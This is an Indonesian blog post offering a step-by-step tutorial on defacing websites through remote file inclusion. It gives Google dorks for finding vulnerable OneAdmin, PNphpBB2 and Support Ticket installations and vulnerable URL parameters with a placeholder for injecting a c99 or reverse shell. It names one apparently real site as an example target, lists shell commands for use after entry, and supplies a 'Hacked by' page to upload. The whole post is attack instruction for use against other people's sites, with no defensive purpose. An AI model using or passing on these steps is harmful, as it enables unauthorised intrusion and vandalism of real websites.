GO TO MY HOME PAGE














  • INDONESIA BLOGGER
  • Welcome to my blog

    Selasa, 02 April 2013

    Cara deface Via RFI

    cara Mudah Deface Remote File Include

    Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..



    cd namadirectory = Melihat Suatu directory

    ls -al = Melihat Suatu Directory Lebih Dalam lagi

    find = Mengecek Directory directory

    cat = Membaca Suatu Berkas

    wget = MengUpload suatu Files

    tar -zxvf = MengExtraxt suatu files yang berbentuk tgz

    pwd = Mengetahui Di Directory mana Kita Berada

    uname -a = Keberadaan Path berada

    w = Mengetahui Siapa Saja yang telah menggunakan Shell.

    curl = mendownload url

    [EvilShellInject] = inject rshell / c99 kamu

    Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :

    Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com

    - Site Oneadmin RFI



    Kamu Search di Google masukkan dulu dork nya ya kan " oneadmin site:.com / oneadmin site:com" tanpa tanda petik ya beroh.

    nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=



    Contoh :

    http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]

    - PnPhpBB2

    Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…

    nah sekarang ane kasi contoh pathnya … http://target.com/modules/PNphpBB2/inclu...root_path=[EvilShellInject]



    Contoh :

    http://www.sikhe.com/modules/PNphpBB2/in...root_path=[EvilShellInject]

    - Support Ticket



    Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…

    nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=

    Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]



    Hehehe Lumayan banyak kan ? Nah selamat mencobanya..

    Nah setelah itu buatlah sebuad file untuk halaman deface kamu bro.



    Isi dengan:

    <html>

    Hacked by Nama Kamu

    </html>

    Kemudian upload dah file ke directorynya



    kemudian buka website yang telah di deface:

    http://target.com/lokasipathnya/index.html

    sekian dlu ya bro ntr ane  mau pos tentang cara deface lainnya ,
    hehehehe


    0 komentar:

    Posting Komentar